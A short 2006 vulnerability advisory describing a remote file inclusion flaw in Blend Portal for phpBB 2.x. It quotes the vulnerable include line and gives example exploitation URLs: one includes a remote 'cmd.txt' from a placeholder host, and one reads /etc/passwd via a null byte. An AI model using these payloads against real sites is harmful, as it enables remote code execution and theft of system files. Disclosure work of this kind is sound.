--Security Report--
Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability.
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
Date: 28/05/06 07:52 PM
ICQ: 10072
Web: http://www.nukedx.com
Vendor: phpbb-portal (http://www.phpbb-portal.com/)
Version: 1.2.0 and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary internal/external files to phpBB. phpbb_root_path variable in /blend_data/blend_common.php did not sanitized properly before using it.You can find vulnerable code in
blend_common.php at lines 74-77
-Source in blend_common.php-
74: else
75: {
76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH .'config.'. $phpEx);
77: }
-End of source-
Level: Highly Critical
Succesful exploitation needs register_globals on & allow url_fopen on
GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE] EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00
* 28/05/2006: Vulnerability found.
* 28/05/2006: Contacted with vendor and waiting reply.
Exploit: http://www.nukedx.com/?getxpl=41
Original advisory can be found at: http://www.nukedx.com/?viewdoc=41

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